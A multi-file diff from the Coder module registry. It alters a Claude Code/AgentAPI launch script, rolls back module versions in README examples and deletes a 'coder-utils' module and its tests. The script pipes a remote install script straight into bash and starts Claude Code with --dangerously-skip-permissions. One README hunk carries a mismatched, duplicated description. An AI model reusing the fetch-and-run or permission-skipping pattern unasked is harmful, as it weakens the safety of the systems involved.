-printf "ARG_COMPILE_FROM_SOURCE: %s\n" "$ARG_COMPILE_FROM_SOURCE"
-printf "ARG_USE_BOUNDARY_DIRECTLY: %s\n" "$ARG_USE_BOUNDARY_DIRECTLY"
-printf "ARG_CODER_HOST: %s\n" "$ARG_CODER_HOST"
+log "ARG_RESUME: %s\n" "$ARG_RESUME_SESSION_ID"
+log "ARG_CONTINUE: %s\n" "$ARG_CONTINUE"
+log "ARG_DANGEROUSLY_SKIP_PERMISSIONS: %s\n" "$ARG_DANGEROUSLY_SKIP_PERMISSIONS"
+log "ARG_PERMISSION_MODE: %s\n" "$ARG_PERMISSION_MODE"
+log "ARG_AI_PROMPT: %s\n" "$ARG_AI_PROMPT"
+log "ARG_WORKDIR: %s\n" "$ARG_WORKDIR"
+log "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
+log "ARG_ENABLE_BOUNDARY: %s\n" "$ARG_ENABLE_BOUNDARY"
+log "ARG_BOUNDARY_VERSION: %s\n" "$ARG_BOUNDARY_VERSION"
+log "ARG_COMPILE_FROM_SOURCE: %s\n" "$ARG_COMPILE_FROM_SOURCE"
+log "ARG_CODER_HOST: %s\n" "$ARG_CODER_HOST"

-echo "--------------------------------"
+log "--------------------------------\n"

 function install_boundary() {
-  if [ "$ARG_COMPILE_FROM_SOURCE" = "true" ]; then
+  if [ "${ARG_COMPILE_FROM_SOURCE:-false}" = "true" ]; then
    # Install boundary by compiling from source
-    echo "Compiling boundary from source (version: $ARG_BOUNDARY_VERSION)"
+    log "Compiling boundary from source (version: $ARG_BOUNDARY_VERSION)\n"

-    echo "Removing existing boundary directory to allow re-running the script safely"
+    log "Removing existing boundary directory to allow re-running the script safely\n"
    if [ -d boundary ]; then
      rm -rf boundary
    fi

-    echo "Clone boundary repository"
+    log "Clone boundary repository\n"
    git clone https://github.com/coder/boundary.git
    cd boundary
    git checkout "$ARG_BOUNDARY_VERSION"
@@ -60,24 +61,22 @@ function install_boundary() {
    # Build the binary
    make build

-    # Install binary
+    # Install binary and wrapper script (optional)
    sudo cp boundary /usr/local/bin/
-    sudo chmod +x /usr/local/bin/boundary
-  elif [ "$ARG_USE_BOUNDARY_DIRECTLY" = "true" ]; then
-    # Install boundary using official install script
-    echo "Installing boundary using official install script (version: $ARG_BOUNDARY_VERSION)"
-    curl -fsSL https://raw.githubusercontent.com/coder/boundary/main/install.sh | bash -s -- --version "$ARG_BOUNDARY_VERSION"
+    sudo cp scripts/boundary-wrapper.sh /usr/local/bin/boundary-run
+    sudo chmod +x /usr/local/bin/boundary-run
  else
-    # Use coder boundary subcommand (default) - no installation needed
-    echo "Using coder boundary subcommand (provided by Coder)"
+    # Install boundary using official install script
+    log "Installing boundary using official install script (version: $ARG_BOUNDARY_VERSION)\n"
+    curl -fsSL https://raw.githubusercontent.com/coder/boundary/main/install.sh | bash -s -- --version "$ARG_BOUNDARY_VERSION"
  fi
 }

 function validate_claude_installation() {
  if command_exists claude; then
-    printf "Claude Code is installed\n"
+    log "Claude Code is installed\n"
  else
-    printf "Error: Claude Code is not installed. Please enable install_claude_code or install it manually\n"
+    log "Error: Claude Code is not installed. Please enable install_claude_code or install it manually\n"
    exit 1
  fi
 }
@@ -88,7 +87,7 @@ TASK_SESSION_ID="cd32e253-ca16-4fd3-9825-d837e74ae3c2"

 get_project_dir() {
  local workdir_normalized
-  workdir_normalized=$(echo "$ARG_WORKDIR" | tr '/._' '-')
+  workdir_normalized=$(echo "$ARG_WORKDIR" | tr '/' '-')
  echo "$HOME/.claude/projects/${workdir_normalized}"
 }

@@ -101,10 +100,10 @@ task_session_exists() {
  session_file=$(get_task_session_file)

  if [ -f "$session_file" ]; then
-    printf "Task session file found: %s\n" "$session_file"
+    log "Task session file found: %s\n" "$session_file"
    return 0
  else
-    printf "Task session file not found: %s\n" "$session_file"
+    log "Task session file not found: %s\n" "$session_file"
    return 1
  fi
 }
@@ -115,12 +114,12 @@ is_valid_session() {
  # Check if file exists and is not empty
  # Empty files indicate the session was created but never used so they need to be removed
  if [ ! -f "$session_file" ]; then
-    printf "Session validation failed: file does not exist\n"
+    log "Session validation failed: file does not exist\n"
    return 1
  fi

  if [ ! -s "$session_file" ]; then
-    printf "Session validation failed: file is empty, removing stale file\n"
+    log "Session validation failed: file is empty, removing stale file\n"
    rm -f "$session_file"
    return 1
  fi
@@ -130,7 +129,7 @@ is_valid_session() {
  local line_count
  line_count=$(wc -l < "$session_file")
  if [ "$line_count" -lt 2 ]; then
-    printf "Session validation failed: incomplete (only %s lines), removing incomplete file\n" "$line_count"
+    log "Session validation failed: incomplete (only %s lines), removing incomplete file\n" "$line_count"
    rm -f "$session_file"
    return 1
  fi
@@ -138,7 +137,7 @@ is_valid_session() {
  # Validate JSONL format by checking first 3 lines
  # Claude session files use JSONL (JSON Lines) format where each line is valid JSON
  if ! head -3 "$session_file" | jq empty 2> /dev/null; then
-    printf "Session validation failed: invalid JSONL format, removing corrupt file\n"
+    log "Session validation failed: invalid JSONL format, removing corrupt file\n"
    rm -f "$session_file"
    return 1
  fi
@@ -147,12 +146,12 @@ is_valid_session() {
  # This ensures the file structure matches Claude's session format
  if ! grep -q '"sessionId"' "$session_file" \
    || ! grep -m 1 '"sessionId"' "$session_file" | jq -e '.sessionId' > /dev/null 2>&1; then
-    printf "Session validation failed: no valid sessionId found, removing malformed file\n"
+    log "Session validation failed: no valid sessionId found, removing malformed file\n"
    rm -f "$session_file"
    return 1
  fi

-  printf "Session validation passed: %s\n" "$session_file"
+  log "Session validation passed: %s\n" "$session_file"
  return 0
 }

@@ -161,16 +160,21 @@ has_any_sessions() {
  project_dir=$(get_project_dir)

  if [ -d "$project_dir" ] && find "$project_dir" -maxdepth 1 -name "*.jsonl" -size +0c 2> /dev/null | grep -q .; then
-    printf "Sessions found in: %s\n" "$project_dir"
+    log "Sessions found in: %s\n" "$project_dir"
    return 0
  else
-    printf "No sessions found in: %s\n" "$project_dir"
+    log "No sessions found in: %s\n" "$project_dir"
    return 1
  fi
 }

 ARGS=()

+CORE_COMMAND=()
+if [[ "${ARG_REPORT_TASKS}" == "true" ]]; then
+  CORE_COMMAND+=(agentapi server --type claude --term-width 67 --term-height 1190 --)
+fi
+
 function start_agentapi() {
  # For Task reporting
  export CODER_MCP_ALLOWED_TOOLS="coder_report_task"
@@ -183,7 +187,7 @@ function start_agentapi() {
  fi

  if [ -n "$ARG_RESUME_SESSION_ID" ]; then
-    echo "Resuming specified session: $ARG_RESUME_SESSION_ID"
+    log "Resuming specified session: $ARG_RESUME_SESSION_ID"
    ARGS+=(--resume "$ARG_RESUME_SESSION_ID")
    [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)

@@ -194,61 +198,45 @@ function start_agentapi() {
      session_file=$(get_task_session_file)

      if task_session_exists && is_valid_session "$session_file"; then
-        echo "Resuming task session: $TASK_SESSION_ID"
+        log "Resuming task session: $TASK_SESSION_ID"
        ARGS+=(--resume "$TASK_SESSION_ID" --dangerously-skip-permissions)
      else
-        echo "Starting new task session: $TASK_SESSION_ID"
+        log "Starting new task session: $TASK_SESSION_ID"
        ARGS+=(--session-id "$TASK_SESSION_ID" --dangerously-skip-permissions)
        [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
      fi

    else
      if has_any_sessions; then
-        echo "Continuing most recent standalone session"
+        log "Continuing most recent standalone session"
        ARGS+=(--continue)
        [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
      else
-        echo "No sessions found, starting fresh standalone session"
+        log "No sessions found, starting fresh standalone session"
        [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
        [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
      fi
    fi

  else
-    echo "Continue disabled, starting fresh session"
+    log "Continue disabled, starting fresh session"
    [ "$ARG_DANGEROUSLY_SKIP_PERMISSIONS" = "true" ] && ARGS+=(--dangerously-skip-permissions)
    [ -n "$ARG_AI_PROMPT" ] && ARGS+=(-- "$ARG_AI_PROMPT")
  fi

-  printf "Running claude code with args: %s\n" "$(printf '%q ' "${ARGS[@]}")"
+  log "Running claude code with args: %s\n" "$(printf '%q ' "${ARGS[@]}")"

-  if [ "$ARG_ENABLE_BOUNDARY" = "true" ]; then
+  if [ "${ARG_ENABLE_BOUNDARY:-false}" = "true" ]; then
    install_boundary

-    printf "Starting with coder boundary enabled\n"
+    log "Starting with coder boundary enabled\n"

    BOUNDARY_ARGS+=()

-    # Determine which boundary command to use
-    if [ "$ARG_COMPILE_FROM_SOURCE" = "true" ] || [ "$ARG_USE_BOUNDARY_DIRECTLY" = "true" ]; then
-      # Use boundary binary directly (from compilation or release installation)
-      BOUNDARY_CMD=("boundary")
-    else
-      # Use coder boundary subcommand (default)
-      # Copy coder binary to coder-no-caps. Copying strips CAP_NET_ADMIN capabilities
-      # from the binary, which is necessary because boundary doesn't work with
-      # privileged binaries (you can't launch privileged binaries inside network
-      # namespaces unless you have sys_admin).
-      CODER_NO_CAPS="$(dirname "$(which coder)")/coder-no-caps"
-      cp "$(which coder)" "$CODER_NO_CAPS"
-      BOUNDARY_CMD=("$CODER_NO_CAPS" "boundary")
-    fi
-
-    agentapi server --type claude --term-width 67 --term-height 1190 -- \
-      "${BOUNDARY_CMD[@]}" "${BOUNDARY_ARGS[@]}" -- \
+    "${CORE_COMMAND[@]}" boundary-run "${BOUNDARY_ARGS[@]}" -- \
      claude "${ARGS[@]}"
  else
-    agentapi server --type claude --term-width 67 --term-height 1190 -- claude "${ARGS[@]}"
+    "${CORE_COMMAND[@]}" claude "${ARGS[@]}"
  fi
 }

@@ -14,7 +14,7 @@ Automatically install [code-server](https://github.com/coder/code-server) in a w
 module "code-server" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.4"
+  version  = "1.4.2"
  agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "code-server" {
 module "code-server" {
  count           = data.coder_workspace.me.start_count
  source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.4"
+  version         = "1.4.2"
  agent_id        = coder_agent.example.id
  install_version = "4.106.3"
 }
@@ -43,7 +43,7 @@ Install the Dracula theme from [OpenVSX](https://open-vsx.org/):
 module "code-server" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.4"
+  version  = "1.4.2"
  agent_id = coder_agent.example.id
  extensions = [
    "dracula-theme.theme-dracula"
@@ -61,7 +61,7 @@ Configure VS Code's [settings.json](https://code.visualstudio.com/docs/getstarte
 module "code-server" {
  count      = data.coder_workspace.me.start_count
  source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.4"
+  version    = "1.4.2"
  agent_id   = coder_agent.example.id
  extensions = ["dracula-theme.theme-dracula"]
  settings = {
@@ -72,13 +72,13 @@ module "code-server" {

 ### Install multiple extensions

-Install multiple extensions from [OpenVSX](https://open-vsx.org/) by adding them to the `extensions` list:
+Just run code-server in the background, don't fetch it from GitHub:

 ```tf
 module "code-server" {
  count      = data.coder_workspace.me.start_count
  source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.4"
+  version    = "1.4.2"
  agent_id   = coder_agent.example.id
  extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
 }
@@ -92,7 +92,7 @@ You can pass additional command-line arguments to code-server using the `additio
 module "code-server" {
  count           = data.coder_workspace.me.start_count
  source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.4"
+  version         = "1.4.2"
  agent_id        = coder_agent.example.id
  additional_args = "--disable-workspace-trust"
 }
@@ -108,7 +108,7 @@ Run an existing copy of code-server if found, otherwise download from GitHub:
 module "code-server" {
  count      = data.coder_workspace.me.start_count
  source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.4"
+  version    = "1.4.2"
  agent_id   = coder_agent.example.id
  use_cached = true
  extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
@@ -121,7 +121,7 @@ Just run code-server in the background, don't fetch it from GitHub:
 module "code-server" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.4"
+  version  = "1.4.2"
  agent_id = coder_agent.example.id
  offline  = true
 }
@@ -44,7 +44,7 @@ variable "settings" {
  default     = {}
 }

-variable "machine_settings" {
+variable "machine-settings" {
  type        = any
  description = "A map of template level machine settings to apply to code-server. This will be overwritten at each container start."
  default     = {}
@@ -167,7 +167,7 @@ resource "coder_script" "code-server" {
    INSTALL_PREFIX : var.install_prefix,
    // This is necessary otherwise the quotes are stripped!
    SETTINGS : replace(jsonencode(var.settings), "\"", "\\\""),
-    MACHINE_SETTINGS : replace(jsonencode(var.machine_settings), "\"", "\\\""),
+    MACHINE_SETTINGS : replace(jsonencode(var.machine-settings), "\"", "\\\""),
    OFFLINE : var.offline,
    USE_CACHED : var.use_cached,
    USE_CACHED_EXTENSIONS : var.use_cached_extensions,
@@ -1,65 +0,0 @@
---
-display_name: Coder Utils
-description: Building block for modules that need orchestrated script execution
-icon: ../../../../.icons/coder.svg
-verified: false
-tags: [internal, library]
---
-
-# Coder Utils
-
-> [!CAUTION]
-> We do not recommend using this module directly. It is intended primarily for internal use by Coder to create modules with orchestrated script execution.
-
-The Coder Utils module is a building block for modules that need to run multiple scripts in a specific order. It uses `coder exp sync` for dependency management and is designed for orchestrating pre-install, install, post-install, and start scripts.
-
-> [!NOTE]
->
-> - The `agent_name` should be the same as that of the agentapi module's `agent_name` if used together.
-
-```tf
-module "coder_utils" {
-  source  = "registry.coder.com/coder/coder-utils/coder"
-  version = "1.0.1"
-
-  agent_id        = coder_agent.main.id
-  agent_name      = "myagent"
-  module_dir_name = ".my-module"
-
-  pre_install_script = <<-EOT
-    #!/bin/bash
-    echo "Running pre-install tasks..."
-    # Your pre-install logic here
-  EOT
-
-  install_script = <<-EOT
-    #!/bin/bash
-    echo "Installing dependencies..."
-    # Your install logic here
-  EOT
-
-  post_install_script = <<-EOT
-    #!/bin/bash
-    echo "Running post-install configuration..."
-    # Your post-install logic here
-  EOT
-
-  start_script = <<-EOT
-    #!/bin/bash
-    echo "Starting the application..."
-    # Your start logic here
-  EOT
-}
-```
-
-## Execution Order
-
-The module orchestrates scripts in the following order:
-
-1. **Log File Creation** - Creates module directory and log files
-2. **Pre-Install Script** (optional) - Runs before installation
-3. **Install Script** - Main installation
-4. **Post-Install Script** (optional) - Runs after installation
-5. **Start Script** - Starts the application
-
-Each script waits for its prerequisites to complete before running using `coder exp sync` dependency management.
@@ -1,13 +0,0 @@
-import { describe } from "bun:test";
-import { runTerraformInit, testRequiredVariables } from "~test";
-
-describe("coder-utils", async () => {
-  await runTerraformInit(import.meta.dir);
-
-  testRequiredVariables(import.meta.dir, {
-    agent_id: "test-agent-id",
-    agent_name: "test-agent",
-    module_dir_name: ".test-module",
-    start_script: "echo 'start'",
-  });
-});
@@ -1,190 +0,0 @@
-terraform {
-  required_version = ">= 1.0"
-
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 2.13"
-    }
-  }
-}
-
-variable "agent_id" {
-  type        = string
-  description = "The ID of a Coder agent."
-}
-
-data "coder_workspace" "me" {}
-
-data "coder_workspace_owner" "me" {}
-
-data "coder_task" "me" {}
-
-variable "pre_install_script" {
-  type        = string
-  description = "Custom script to run before installing the agent used by AgentAPI."
-  default     = null
-}
-
-variable "install_script" {
-  type        = string
-  description = "Script to install the agent used by AgentAPI."
-  default     = null
-}
-
-variable "post_install_script" {
-  type        = string
-  description = "Custom script to run after installing the agent used by AgentAPI."
-  default     = null
-}
-
-variable "start_script" {
-  type        = string
-  description = "Script that starts AgentAPI."
-}
-
-variable "agent_name" {
-  type        = string
-  description = "The name of the agent. This is used to construct unique script names for the experiment sync."
-
-}
-
-variable "module_dir_name" {
-  type        = string
-  description = "The name of the module directory."
-}
-
-locals {
-  encoded_pre_install_script  = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
-  encoded_install_script      = var.install_script != null ? base64encode(var.install_script) : ""
-  encoded_post_install_script = var.post_install_script != null ? base64encode(var.post_install_script) : ""
-  encoded_start_script        = base64encode(var.start_script)
-
-  pre_install_script_name  = "${var.agent_name}-pre_install_script"
-  install_script_name      = "${var.agent_name}-install_script"
-  post_install_script_name = "${var.agent_name}-post_install_script"
-  start_script_name        = "${var.agent_name}-start_script"
-
-  module_dir_path = "$HOME/${var.module_dir_name}"
-
-  pre_install_path  = "${local.module_dir_path}/pre_install.sh"
-  install_path      = "${local.module_dir_path}/install.sh"
-  post_install_path = "${local.module_dir_path}/post_install.sh"
-  start_path        = "${local.module_dir_path}/start.sh"
-
-  pre_install_log_path  = "${local.module_dir_path}/pre_install.log"
-  install_log_path      = "${local.module_dir_path}/install.log"
-  post_install_log_path = "${local.module_dir_path}/post_install.log"
-  start_log_path        = "${local.module_dir_path}/start.log"
-}
-
-resource "coder_script" "pre_install_script" {
-  count        = var.pre_install_script == null ? 0 : 1
-  agent_id     = var.agent_id
-  display_name = "Pre-Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    mkdir -p ${local.module_dir_path}
-
-    trap 'coder exp sync complete ${local.pre_install_script_name}' EXIT
-    coder exp sync start ${local.pre_install_script_name}
-
-    echo -n '${local.encoded_pre_install_script}' | base64 -d > ${local.pre_install_path}
-    chmod +x ${local.pre_install_path}
-
-    ${local.pre_install_path} > ${local.pre_install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "install_script" {
-  agent_id     = var.agent_id
-  display_name = "Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    mkdir -p ${local.module_dir_path}
-
-    trap 'coder exp sync complete ${local.install_script_name}' EXIT
-    %{if var.pre_install_script != null~}
-      coder exp sync want ${local.install_script_name} ${local.pre_install_script_name}
-    %{endif~}
-    coder exp sync start ${local.install_script_name}
-    echo -n '${local.encoded_install_script}' | base64 -d > ${local.install_path}
-    chmod +x ${local.install_path}
-
-    ${local.install_path} > ${local.install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "post_install_script" {
-  count        = var.post_install_script != null ? 1 : 0
-  agent_id     = var.agent_id
-  display_name = "Post-Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    trap 'coder exp sync complete ${local.post_install_script_name}' EXIT
-    coder exp sync want ${local.post_install_script_name} ${local.install_script_name}
-    coder exp sync start ${local.post_install_script_name}
-
-    echo -n '${local.encoded_post_install_script}' | base64 -d > ${local.post_install_path}
-    chmod +x ${local.post_install_path}
-
-    ${local.post_install_path} > ${local.post_install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "start_script" {
-  agent_id     = var.agent_id
-  display_name = "Start Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    trap 'coder exp sync complete ${local.start_script_name}' EXIT
-
-    %{if var.post_install_script != null~}
-    coder exp sync want ${local.start_script_name} ${local.install_script_name} ${local.post_install_script_name}
-    %{else~}
-    coder exp sync want ${local.start_script_name} ${local.install_script_name}
-    %{endif~}
-    coder exp sync start ${local.start_script_name}
-
-    echo -n '${local.encoded_start_script}' | base64 -d > ${local.start_path}
-    chmod +x ${local.start_path}
-
-    ${local.start_path} > ${local.start_log_path} 2>&1
-  EOT
-}
-
-output "pre_install_script_name" {
-  description = "The name of the pre-install script for sync."
-  value       = local.pre_install_script_name
-}
-
-output "install_script_name" {
-  description = "The name of the install script for sync."
-  value       = local.install_script_name
-}
-
-output "post_install_script_name" {
-  description = "The name of the post-install script for sync."
-  value       = local.post_install_script_name
-}
-
-output "start_script_name" {
-  description = "The name of the start script for sync."
-  value       = local.start_script_name
-}
@@ -1,271 +0,0 @@
-# Test for coder-utils module
-
-# Test with all scripts provided
-run "test_with_all_scripts" {
-  command = plan
-
-  variables {
-    agent_id            = "test-agent-id"
-    agent_name          = "test-agent"
-    module_dir_name     = ".test-module"
-    pre_install_script  = "echo 'pre-install'"
-    install_script      = "echo 'install'"
-    post_install_script = "echo 'post-install'"
-    start_script        = "echo 'start'"
-  }
-
-  # Verify pre_install_script is created when provided
-  assert {
-    condition     = length(coder_script.pre_install_script) == 1
-    error_message = "Pre-install script should be created when pre_install_script is provided"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].agent_id == "test-agent-id"
-    error_message = "Pre-install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].display_name == "Pre-Install Script"
-    error_message = "Pre-install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].run_on_start == true
-    error_message = "Pre-install script should run on start"
-  }
-
-  # Verify install_script is created
-  assert {
-    condition     = coder_script.install_script.agent_id == "test-agent-id"
-    error_message = "Install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.install_script.display_name == "Install Script"
-    error_message = "Install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.install_script.run_on_start == true
-    error_message = "Install script should run on start"
-  }
-
-  # Verify post_install_script is created when provided
-  assert {
-    condition     = length(coder_script.post_install_script) == 1
-    error_message = "Post-install script should be created when post_install_script is provided"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].agent_id == "test-agent-id"
-    error_message = "Post-install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].display_name == "Post-Install Script"
-    error_message = "Post-install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].run_on_start == true
-    error_message = "Post-install script should run on start"
-  }
-
-  # Verify start_script is created
-  assert {
-    condition     = coder_script.start_script.agent_id == "test-agent-id"
-    error_message = "Start script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.start_script.display_name == "Start Script"
-    error_message = "Start script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.start_script.run_on_start == true
-    error_message = "Start script should run on start"
-  }
-
-  # Verify outputs for script names
-  assert {
-    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
-    error_message = "Pre-install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.install_script_name == "test-agent-install_script"
-    error_message = "Install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "test-agent-post_install_script"
-    error_message = "Post-install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.start_script_name == "test-agent-start_script"
-    error_message = "Start script name output should be correctly formatted"
-  }
-}
-
-# Test with only required scripts (no pre/post install)
-run "test_without_optional_scripts" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent-id"
-    agent_name      = "test-agent"
-    module_dir_name = ".test-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Verify pre_install_script is NOT created when not provided
-  assert {
-    condition     = length(coder_script.pre_install_script) == 0
-    error_message = "Pre-install script should not be created when pre_install_script is null"
-  }
-
-  # Verify post_install_script is NOT created when not provided
-  assert {
-    condition     = length(coder_script.post_install_script) == 0
-    error_message = "Post-install script should not be created when post_install_script is null"
-  }
-
-  # Verify required scripts are still created
-  assert {
-    condition     = coder_script.install_script.agent_id == "test-agent-id"
-    error_message = "Install script should be created"
-  }
-
-  assert {
-    condition     = coder_script.start_script.agent_id == "test-agent-id"
-    error_message = "Start script should be created"
-  }
-
-  # Verify outputs
-  assert {
-    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
-    error_message = "Pre-install script name output should be generated even when script is not created"
-  }
-
-  assert {
-    condition     = output.install_script_name == "test-agent-install_script"
-    error_message = "Install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "test-agent-post_install_script"
-    error_message = "Post-install script name output should be generated even when script is not created"
-  }
-
-  assert {
-    condition     = output.start_script_name == "test-agent-start_script"
-    error_message = "Start script name output should be correctly formatted"
-  }
-}
-
-# Test with mock data sources
-run "test_with_mock_data" {
-  command = plan
-
-  variables {
-    agent_id        = "mock-agent"
-    agent_name      = "mock-agent"
-    module_dir_name = ".mock-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Mock the data sources for testing
-  override_data {
-    target = data.coder_workspace.me
-    values = {
-      id            = "test-workspace-id"
-      name          = "test-workspace"
-      owner         = "test-owner"
-      owner_id      = "test-owner-id"
-      template_id   = "test-template-id"
-      template_name = "test-template"
-      access_url    = "https://coder.example.com"
-      start_count   = 1
-      transition    = "start"
-    }
-  }
-
-  override_data {
-    target = data.coder_workspace_owner.me
-    values = {
-      id            = "test-owner-id"
-      email         = "test@example.com"
-      name          = "Test User"
-      session_token = "mock-token"
-    }
-  }
-
-  override_data {
-    target = data.coder_task.me
-    values = {
-      id = "test-task-id"
-    }
-  }
-
-  # Verify scripts are created with mocked data
-  assert {
-    condition     = coder_script.install_script.agent_id == "mock-agent"
-    error_message = "Install script should use the mocked agent ID"
-  }
-
-  assert {
-    condition     = coder_script.start_script.agent_id == "mock-agent"
-    error_message = "Start script should use the mocked agent ID"
-  }
-}
-
-# Test script naming with custom agent_name
-run "test_script_naming" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent"
-    agent_name      = "custom-name"
-    module_dir_name = ".test-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Verify script names are constructed correctly
-  # The script should contain references to custom-name-* in the sync commands
-  assert {
-    condition     = can(regex("custom-name-install_script", coder_script.install_script.script))
-    error_message = "Install script should use custom agent_name in sync commands"
-  }
-
-  assert {
-    condition     = can(regex("custom-name-start_script", coder_script.start_script.script))
-    error_message = "Start script should use custom agent_name in sync commands"
-  }
-
-  # Verify outputs use custom agent_name
-  assert {
-    condition     = output.pre_install_script_name == "custom-name-pre_install_script"
-    error_message = "Pre-install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.install_script_name == "custom-name-install_script"
-    error_message = "Install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "custom-name-post_install_script"
-    error_message = "Post-install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.start_script_name == "custom-name-start_script"
-    error_message = "Start script name output should use custom agent_name"
-  }
-}
@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "cursor" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
  agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "cursor" {
 module "cursor" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Cursor to use the GitHub MCP server with authen
 module "cursor" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
  mcp = jsonencode({
@@ -66,7 +66,7 @@ locals {

 module "vscode-desktop-core" {
  source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"

  agent_id = var.agent_id

@@ -14,9 +14,8 @@ The devcontainers-cli module provides an easy way to install [`@devcontainers/cl

 ```tf
 module "devcontainers-cli" {
-  source             = "registry.coder.com/coder/devcontainers-cli/coder"
-  version            = "1.1.0"
-  agent_id           = coder_agent.example.id
-  start_blocks_login = false
+  source   = "registry.coder.com/coder/devcontainers-cli/coder"
+  version  = "1.0.34"
+  agent_id = coder_agent.example.id
 }
 ```
@@ -14,17 +14,10 @@ variable "agent_id" {
  description = "The ID of a Coder agent."
 }

-variable "start_blocks_login" {
-  type        = bool
-  default     = false
-  description = "Boolean, This option determines whether users can log in immediately or must wait for the workspace to finish running this script upon startup."
-}
-
 resource "coder_script" "devcontainers-cli" {
-  agent_id           = var.agent_id
-  display_name       = "devcontainers-cli"
-  icon               = "/icon/devcontainers.svg"
-  script             = templatefile("${path.module}/run.sh", {})
-  run_on_start       = true
-  start_blocks_login = var.start_blocks_login
+  agent_id     = var.agent_id
+  display_name = "devcontainers-cli"
+  icon         = "/icon/devcontainers.svg"
+  script       = templatefile("${path.module}/run.sh", {})
+  run_on_start = true
 }
@@ -18,7 +18,7 @@ Under the hood, this module uses the [coder dotfiles](https://coder.com/docs/v2/
 module "dotfiles" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.4.1"
+  version  = "1.2.3"
  agent_id = coder_agent.example.id
 }
 ```
@@ -31,7 +31,7 @@ module "dotfiles" {
 module "dotfiles" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.4.1"
+  version  = "1.2.3"
  agent_id = coder_agent.example.id
 }
 ```
@@ -42,7 +42,7 @@ module "dotfiles" {
 module "dotfiles" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.4.1"
+  version  = "1.2.3"
  agent_id = coder_agent.example.id
  user     = "root"
 }
@@ -54,34 +54,20 @@ module "dotfiles" {
 module "dotfiles" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.4.1"
+  version  = "1.2.3"
